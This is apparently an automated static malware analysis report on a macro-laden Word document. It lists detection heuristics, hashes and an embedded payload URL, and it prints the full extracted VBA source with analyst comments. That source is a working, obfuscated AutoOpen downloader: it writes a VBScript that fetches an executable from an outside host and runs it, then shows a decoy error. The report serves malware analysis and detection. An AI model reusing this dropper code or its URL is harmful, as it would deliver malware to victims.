Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 4914ce479a8de9cc…

MALICIOUS

Office (OOXML)

201.3 KB Created: 2016-11-01 17:08:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2016-12-24
MD5: 446604d46e0f2b836f9b56bd41a3571f SHA-1: 56bfe011d98538bae3fc46fc1b26097835bc2ead SHA-256: 4914ce479a8de9cc9ff1a7689cfc4fb3a5f84203a6075cd32d333b1f590dc904
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including an AutoOpen subroutine, which is designed to execute automatically when the document is opened. The script contains a call to the Shell function, indicating an attempt to execute a downloaded payload. The document body contains a URL that likely serves as the download location for this payload.

Heuristics 6

  • ClamAV: Doc.Downloader.Valyria-6923204-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6923204-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Public Sub ljhhdvnwowbk(kaaqnxwqhs)
    Shell kaaqnxwqhs, 1
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Public Sub AutoOpen()
    wdweuacsso
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ggjghhfhfh.com/kqaer2c56ds34caq12/file2.exe\ In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8284 bytes
SHA-256: 3ad3e50a301aa31e31c399e4cc43b47048fcec15671ff51f9164baadbd74295e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header of the extracted ThisDocument module (artifact "macros.bas", olevba output).
' These appear to be the stock attributes of a Word ThisDocument module; nothing here is a
' finding on its own — the OLE_VBA_AUTOOPEN hit below matched on the Sub that follows.
' Auto-execution entry point: Word runs AutoOpen when the document is opened with macros
' enabled (heuristic OLE_VBA_AUTOOPEN above). All of the malicious work is delegated to
' wdweuacsso; this Sub is kept to a single call, presumably so the auto-exec routine itself
' carries no suspicious tokens.
Public Sub AutoOpen()
wdweuacsso
End Sub
' Filler routine — no caller in the extracted source; it only does arithmetic on
' uninitialised local Variants and has no side effects. Presumably padding to dilute
' signature/score matching — confirm.
' NOTE(review): wtcadlhpsv, nuihvatwqi and qwhaxukujp are each declared twice in this scope.
' As written that is a "Duplicate declaration in current scope" compile error in VBA, so the
' code that actually ran may have been the shipped p-code rather than this source
' (cf. OLE_VBA_PCODE_AUTOEXEC_EXEC above) — confirm against the vbaProject.bin artifact.
Private Sub aquikrxiqpm()
Dim ebnxkaxkwf
Dim fcdrmxxmqo
Dim wtcadlhpsv
Dim wtcadlhpsv, wtcadlhpsv1
Dim onbqdwxlwh
Dim nuihvatwqi
Dim nuihvatwqi, nuihvatwqi1
Dim hfvqkqjiwn
Dim gcpglaavcl
Dim qwhaxukujp
Dim qwhaxukujp, qwhaxukujp1
qwhaxukujp1 = wtcadlhpsv1 + 784
onbqdwxlwh = gcpglaavcl * 354
qwhaxukujp = hfvqkqjiwn + 707
wtcadlhpsv1 = onbqdwxlwh * 13
ebnxkaxkwf = wtcadlhpsv1 + 500
onbqdwxlwh = qwhaxukujp * 163
hfvqkqjiwn = ebnxkaxkwf + 160
ebnxkaxkwf = onbqdwxlwh * 466
onbqdwxlwh = wtcadlhpsv1 + 590
fcdrmxxmqo = qwhaxukujp1 * 935
onbqdwxlwh = fcdrmxxmqo + 907
qwhaxukujp = wtcadlhpsv1 * 812

End Sub '

' Thin wrapper around Shell (heuristic OLE_VBA_SHELL): runs whatever command string it is
' given, window style 1 (vbNormalFocus). Its only caller is wdweuacsso, which passes
' "wscript <dropped .vbs path>". Indirection like this keeps the Shell token away from the
' string it executes.
' Detection note: in endpoint telemetry this typically surfaces as wscript.exe spawned by
' WINWORD.EXE — confirm on a live run.
Public Sub ljhhdvnwowbk(kaaqnxwqhs)
Shell kaaqnxwqhs, 1
End Sub
' Filler routine — no caller in the extracted source; arithmetic on uninitialised local
' Variants only, no side effects. Presumably padding to dilute signature/score matching — confirm.
Private Sub uhehhdgpkb()
Dim tejegfsrmf
Dim bnplsjtddl
Dim tefenkjraf
Dim gotxlaxwbp
Dim pojxbqnira
tejegfsrmf = pojxbqnira + 862
gotxlaxwbp = bnplsjtddl * 330
tejegfsrmf = bnplsjtddl + 946
bnplsjtddl = pojxbqnira * 661
bnplsjtddl = pojxbqnira + 175
bnplsjtddl = tejegfsrmf * 102
gotxlaxwbp = pojxbqnira + 694
bnplsjtddl = tefenkjraf * 368
tejegfsrmf = gotxlaxwbp + 154
tejegfsrmf = pojxbqnira * 744
tejegfsrmf = pojxbqnira + 945
bnplsjtddl = bnplsjtddl * 41
bnplsjtddl = bnplsjtddl + 827
pojxbqnira = tefenkjraf * 525
gotxlaxwbp = pojxbqnira + 38
pojxbqnira = bnplsjtddl * 464
tefenkjraf = tejegfsrmf + 872
tefenkjraf = gotxlaxwbp * 991
tejegfsrmf = tefenkjraf + 186
bnplsjtddl = tejegfsrmf * 442
pojxbqnira = tefenkjraf + 506
gotxlaxwbp = pojxbqnira * 357

End Sub '

' Recovers the download URL that is hidden in the document's own body text, so that no URL
' has to appear in the macro source.
' Decodes the two marker strings ("http" and "\") via pgihatxtkhno, then runs a wildcard Find
' for "http*\" over ActiveDocument.Content; on a hit Word narrows the Range to the matched
' text. Returns that text minus its last two characters, with carriage returns removed and
' trimmed. The EMBEDDED_URL finding above shows exactly such a string ("...file2.exe\") in
' the document body.
' NOTE(review): there is no check on the result of Find.Execute; if nothing matches, the
' Range still spans the whole document and the function returns (nearly) the full body text.
Function asmqnukkts() As String
Dim ipfseugqlsqa As Range
    Dim ciovvfnlskk As String, rewkgxrwlb As String
Dim nfsstjdrwse As String
    ciovvfnlskk = pgihatxtkhno("htLHE91tp") ' decodes to "http"
    rewkgxrwlb = pgihatxtkhno("\") ' decodes to "\" — the terminator placed after the hidden URL
    Set ipfseugqlsqa = ActiveDocument.Content
    ipfseugqlsqa.Find.ClearFormatting
    ipfseugqlsqa.Find.Replacement.ClearFormatting
    With ipfseugqlsqa.Find
        .Text = ciovvfnlskk & "*" & rewkgxrwlb ' wildcard pattern "http*\"
        .Replacement.Text = ""
        .Forward = True
        .Wrap = wdFindStop
        .Format = False
        .MatchWholeWord = False
        .MatchWildcards = True

        .MatchAllWordForms = False '
    End With

    ipfseugqlsqa.Find.Execute ' on success the Range now covers only the matched text
   nfsstjdrwse = ipfseugqlsqa.Text
     nfsstjdrwse = Left(nfsstjdrwse, Len(nfsstjdrwse) - 2) ' drop the trailing "\" terminator plus one more character — presumably a separator, confirm
nfsstjdrwse = Replace(nfsstjdrwse, Chr(13), "")
   asmqnukkts = Trim(nfsstjdrwse)
    
  
End Function
' Filler routine — no caller in the extracted source; arithmetic on uninitialised local
' Variants only, no side effects. Presumably padding to dilute signature/score matching — confirm.
' NOTE(review): ljvpxpgxxi is declared twice in this scope, which is a "Duplicate declaration
' in current scope" compile error in VBA if the module is compiled from this source — suggests
' the shipped p-code is what ran (cf. OLE_VBA_PCODE_AUTOEXEC_EXEC); confirm.
Private Sub xhgejruxuf()
Dim tpupnurbob
Dim jjmdtwifeg
Dim mxrcvjgbbt
Dim ihnwsjufei
Dim msaktwgcdp
Dim hpuknhdtco
Dim jqjugjtdtn
Dim ljvpxpgxxi
Dim ljvpxpgxxi, ljvpxpgxxi1
Dim pphxtuihor
Dim mfhrgveewc
Dim gtajnrogmo
msaktwgcdp = msaktwgcdp + 670
mxrcvjgbbt = ljvpxpgxxi1 * 536
mxrcvjgbbt = mxrcvjgbbt + 784
msaktwgcdp = msaktwgcdp * 591
ihnwsjufei = ljvpxpgxxi1 + 635
ljvpxpgxxi = jjmdtwifeg * 699
ljvpxpgxxi = ljvpxpgxxi1 + 336
mfhrgveewc = mxrcvjgbbt * 782
msaktwgcdp = gtajnrogmo + 247
ljvpxpgxxi = mfhrgveewc * 247
jjmdtwifeg = ihnwsjufei + 770
gtajnrogmo = ljvpxpgxxi1 * 634
mfhrgveewc = msaktwgcdp + 591
gtajnrogmo = msaktwgcdp * 201
jqjugjtdtn = gtajnrogmo + 165
ihnwsjufei = jjmdtwifeg * 803
pphxtuihor = gtajnrogmo + 762
hpuknhdtco = pphxtuihor * 620
jjmdtwifeg = hpuknhdtco + 996
tpupnurbob = jqjugjtdtn * 588
ihnwsjufei = pphxtuihor + 53
ljvpxpgxxi = pphxtuihor * 464
hpuknhdtco = ljvpxpgxxi + 661
pphxtuihor = ljvpxpgxxi * 377
msaktwgcdp = ljvpxpgxxi1 + 786
hpuknhdtco = hpuknhdtco * 683
jqjugjtdtn = gtajnrogmo + 770
pphxtuihor = ljvpxpgxxi1 * 33
ihnwsjufei = tpupnurbob + 209
gtajnrogmo = hpuknhdtco * 859
hpuknhdtco = mxrcvjgbbt + 146
jqjugjtdtn = pphxtuihor * 219
ljvpxpgxxi1 = pphxtuihor + 118
msaktwgcdp = hpuknhdtco * 96

End Sub '


' Returns a single double-quote character ("""" is VBA's escaped one-quote literal).
' wdweuacsso uses it to quote the strings inside the generated VBScript, so no literal quote
' appears in that source — presumably to frustrate string-based matching; confirm.
Function nudeqjcceam()
nudeqjcceam = """"
End Function
' Filler routine — no caller in the extracted source; arithmetic on uninitialised local
' Variants only, no side effects. Presumably padding to dilute signature/score matching — confirm.
' NOTE(review): bosbfsvbua and ivwcvecnqq are each declared twice in this scope — a
' "Duplicate declaration in current scope" compile error in VBA if compiled from this source;
' suggests the shipped p-code is what ran (cf. OLE_VBA_PCODE_AUTOEXEC_EXEC). Confirm.
Private Sub ecvagpjfrxa()
Dim bosbfsvbua
Dim bosbfsvbua, bosbfsvbua1
Dim uftpmaasaf
Dim sflnjscami
Dim igatfoklkt
Dim ivwcvecnqq
Dim ivwcvecnqq, ivwcvecnqq1
Dim ifcwevvace
Dim jantdgqrvi
igatfoklkt = ivwcvecnqq + 917
igatfoklkt = uftpmaasaf * 157
bosbfsvbua = jantdgqrvi + 496
uftpmaasaf = uftpmaasaf * 369
ivwcvecnqq1 = ivwcvecnqq1 + 314
igatfoklkt = jantdgqrvi * 921
ifcwevvace = jantdgqrvi + 946
ivwcvecnqq1 = jantdgqrvi * 248

End Sub '




' Dropper stage, reached from AutoOpen. Every string literal is salted with the "LHE91"
' marker and decoded at run time by pgihatxtkhno; nudeqjcceam supplies the double-quote
' character. Sequence, by inspection of the decoded literals:
'   1. decode the drop name ("wardxs.vbs") and open it for writing as file #2 — a relative
'      path, so it lands in the process's current directory; confirm on a live run;
'   2. assemble a second-stage VBScript whose object/method names carry a further "/*/"
'      layer that the script strips itself (its g() helper). The script issues an HTTP GET
'      for the URL recovered by asmqnukkts through an MSXML2.ServerXMLHTTP object, writes
'      the response body to a local file ("error.bat") via ADODB.Stream after deleting any
'      existing copy, and runs it with WScript.Shell — consistent with the "Downloader"
'      ClamAV label above;
'   3. write the script, close the file, and launch it via ljhhdvnwowbk ("wscript "<path>"");
'   4. show a decoy vbCritical (16) MsgBox "Failed loading document" titled
'      "Windows mxtkbveetl" and quit Word, so the user sees a bogus error instead of a macro.
' Detection points: .vbs written by WINWORD.EXE, wscript.exe child process, XMLHTTP and
' ADODB.Stream use from wscript, and the outbound request to the URL under EMBEDDED_URL.
Private Sub wdweuacsso()

Dim bfuacreoffv, jcutsgtufd

bfuacreoffv = pgihatxtkhno("LHE91wLHE91aLHE91rLHE91dxsLHE91.LHE91vbs") ' decodes to "wardxs.vbs"
Open bfuacreoffv For Output As #2
jcutsgtufd = pgihatxtkhno("e = g(" & nudeqjcceam & "eLHE91rrLHE91or/LHE91*/./*/bLHE91at" & nudeqjcceam & "): SLHE91et aLHE91 = CO(" & nudeqjcceam & "MLHE91/*/LHE91S/*LHE91/X/*LHE91/LHE91M/LHE91*LHE91/LHE91L/*/2/*/.S/*/LHE91er/*/LHE91ve/*/r/*/XMLHE91/*/LHE91LHLHE91/LHE91*/TT/*/P" & nudeqjcceam & "): aLHE91.open g(" & nudeqjcceam & "G/*/ELHE91/LHE91*/T/*/" & nudeqjcceam & "LHE91),LHE91 " & nudeqjcceam)
jcutsgtufd = jcutsgtufd & asmqnukkts ' splice in the URL recovered from the document body
jcutsgtufd = pgihatxtkhno(jcutsgtufd & nudeqjcceam & ", false: aLHE91.send(): LHE91Set bLHE91 = LHE91COLHE91(" & nudeqjcceam & "A/*LHE91/D/*/O/*/D/*/BLHE91/LHE91*LHE91/./*/LHE91S/LHE91*LHE91/t/LHE91*/r/LHE91*/e/*/am" & nudeqjcceam & "): b.Open: LHE91b.TyLHE91pLHE91e = 1LHE91 : b.Write a.ReLHE91sponLHE91seLHE91Body: b.LHE91PoLHE91sitLHE91iLHE91oLHE91n LHE91= 0LHE91 LHE91  :LHE91 LHE91Set c = CO(" & nudeqjcceam & "LHE91S/*/c/*/riptiLHE91ng/*/./*/FLHE91/LHE91*/i/*/LHE91l/*/e/*/LHE91SLHE91/*/y/*LHE91/s/*LHE91/t/*LHE91/e/*/m/*/O/*/LHE91b/*/j/*/e/*/ct" & nudeqjcceam _
& "): If c.FileLHE91exists(eLHE91)LHE91 TheLHE91n c.DLHE91eleteFile e: EnLHE91d If: b.LHE91sLHE91aveToFileLHE91 e: b.Close: DimLHE91 d: SetLHE91 dLHE91 = CLHE91O(" & nudeqjcceam & "W/*/S/LHE91*/c/*/LHE91r/LHE91*/LHE91i/*/LHE91pLHE91/*/t/LHE91*LHE91/./LHE91*/LHE91SLHE91/*/h/LHE91*/e/*LHE91/lLHE91l" & nudeqjcceam & "LHE91): d.RLHE91un(LHE91eLHE91): FuLHE91ncLHE91tionLHE91 coLHE91(NameLHE91) :LHE91 seLHE91t co = CreaLHE91teObject(g(NLHE91ameLHE91)): ELHE91Nd funcLHE91tioLHE91n: FuLHE91nction g(fLHE91): gLHE91 = ReLHE91place(fLHE91," & nudeqjcceam & "/LHE91*/" & nudeqjcceam & "LHE91," & nudeqjcceam & "" & nudeqjcceam & "): end function")
Print #2, jcutsgtufd
Close #2
ljhhdvnwowbk pgihatxtkhno("wLHE91sLHE91criLHE91pt " & nudeqjcceam & bfuacreoffv & nudeqjcceam) ' Shell: wscript "<dropped .vbs>"
Dim lrnbipiach As String
lrnbipiach = pgihatxtkhno("WiLHE91nLHE91dowLHE91s mxtkbveetl") ' decoy title; "mxtkbveetl" is literal text, not the variable below
Dim ccoxgicxbtjs As String
Dim mxtkbveetl As Integer
ccoxgicxbtjs = pgihatxtkhno("FLHE91ailed lLHE91oaLHE91dinLHE91g doLHE91cuLHE91meLHE91nt") ' decoy message "Failed loading document"
mxtkbveetl = MsgBox(ccoxgicxbtjs, 16, lrnbipiach) ' 16 = vbCritical; return value unused

Application.Quit
End Sub
' Filler routine — no caller in the extracted source; a chain of arithmetic on a single
' uninitialised local Variant, no side effects. Presumably padding to dilute signature/score
' matching — confirm.
Private Sub bdpujhujxdos()
Dim rprlsmtesg
rprlsmtesg = rprlsmtesg + 35
rprlsmtesg = rprlsmtesg * 333
rprlsmtesg = rprlsmtesg + 229
rprlsmtesg = rprlsmtesg * 943
rprlsmtesg = rprlsmtesg + 834
rprlsmtesg = rprlsmtesg * 822
rprlsmtesg = rprlsmtesg + 380
rprlsmtesg = rprlsmtesg * 687
rprlsmtesg = rprlsmtesg + 258
rprlsmtesg = rprlsmtesg * 218
rprlsmtesg = rprlsmtesg + 658
rprlsmtesg = rprlsmtesg * 635
rprlsmtesg = rprlsmtesg + 42
rprlsmtesg = rprlsmtesg * 966
rprlsmtesg = rprlsmtesg + 142
rprlsmtesg = rprlsmtesg * 717
rprlsmtesg = rprlsmtesg + 765
rprlsmtesg = rprlsmtesg * 328
rprlsmtesg = rprlsmtesg + 643
rprlsmtesg = rprlsmtesg * 804
rprlsmtesg = rprlsmtesg + 644
rprlsmtesg = rprlsmtesg * 170

End Sub '




' String decoder used by every other routine in the module: removes each occurrence of the
' salt "LHE91" from s. The salt is inserted inside otherwise-recognisable strings (file
' names, ProgIDs, "wscript", "http") so that they never appear intact in the VBA source.
' Analysis note: applying this same replacement to the literals in wdweuacsso and asmqnukkts
' yields the plaintext described in their headers.
Function pgihatxtkhno(s As String) As String
pgihatxtkhno = Replace(s, "LHE91", "")
End Function
' Filler routine — no caller in the extracted source; arithmetic on uninitialised local
' Variants only, no side effects. Presumably padding to dilute signature/score matching — confirm.
' NOTE(review): tadhurvsth and aptmfcdidl are each declared twice in this scope — a
' "Duplicate declaration in current scope" compile error in VBA if compiled from this source;
' suggests the shipped p-code is what ran (cf. OLE_VBA_PCODE_AUTOEXEC_EXEC). Confirm.
Private Sub cwqctslutsr()
Dim tkemuvodvo
Dim tadhurvsth
Dim tadhurvsth, tadhurvsth1
Dim aptmfcdidl
Dim aptmfcdidl, aptmfcdidl1
Dim gatjwfcqme
tkemuvodvo = aptmfcdidl1 + 691
aptmfcdidl1 = tkemuvodvo * 836
aptmfcdidl = aptmfcdidl1 + 432
tkemuvodvo = aptmfcdidl1 * 893
tadhurvsth = tadhurvsth + 815
tadhurvsth = tkemuvodvo * 259
aptmfcdidl1 = tadhurvsth + 619
aptmfcdidl = gatjwfcqme * 91
gatjwfcqme = tadhurvsth + 920
aptmfcdidl = gatjwfcqme * 518
aptmfcdidl1 = aptmfcdidl + 168
tadhurvsth1 = gatjwfcqme * 476
tadhurvsth1 = aptmfcdidl1 + 796
aptmfcdidl1 = gatjwfcqme * 279

End Sub '
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 30208 bytes
SHA-256: 0f4be6ea8351c12893bb183a1bc5c29ea9009d65581d107a2a314e4b44087c2d
Detection
ClamAV: Doc.Downloader.Valyria-6923204-0
Obfuscation or payload: unlikely